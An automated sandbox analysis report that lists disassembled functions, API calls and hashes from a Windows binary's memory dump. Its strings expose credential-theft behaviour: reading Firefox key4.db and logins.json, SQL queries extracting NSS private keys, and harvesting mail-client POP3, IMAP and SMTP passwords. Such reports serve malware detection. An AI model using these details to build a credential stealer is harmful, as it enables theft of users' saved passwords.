                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                    • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                    • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                    Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,7639E430,?,00000000), ref: 00402533
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                    • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                    Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402869
                                                                                                                                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,7639E430,?,00000000), ref: 004028A3
                                                                                                                                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7639E430,?,00000000), ref: 0040297B
                                                                                                                                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                    Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                    • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2998058495-0
                                                                                                                                                                                    • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                    Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                    • API String ID: 231171946-2189169393
                                                                                                                                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                    Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 633282248-1996832678
                                                                                                                                                                                    • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                    Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406782
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                    • key4.db, xrefs: 00406756
                                                                                                                                                                                    • , xrefs: 00406834
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                    • API String ID: 3614188050-3983245814
                                                                                                                                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                    Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                    • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                      • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,761F0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,761F0A60), ref: 00406D4D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                    • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                    Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                    • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                    Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                    • API String ID: 2003275452-3138536805
                                                                                                                                                                                    • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                                                                                    • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                                                                                    Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                    • API String ID: 1012775001-1343505058
                                                                                                                                                                                    • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                                                                                    Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                    • memset.MSVCRT ref: 00444690
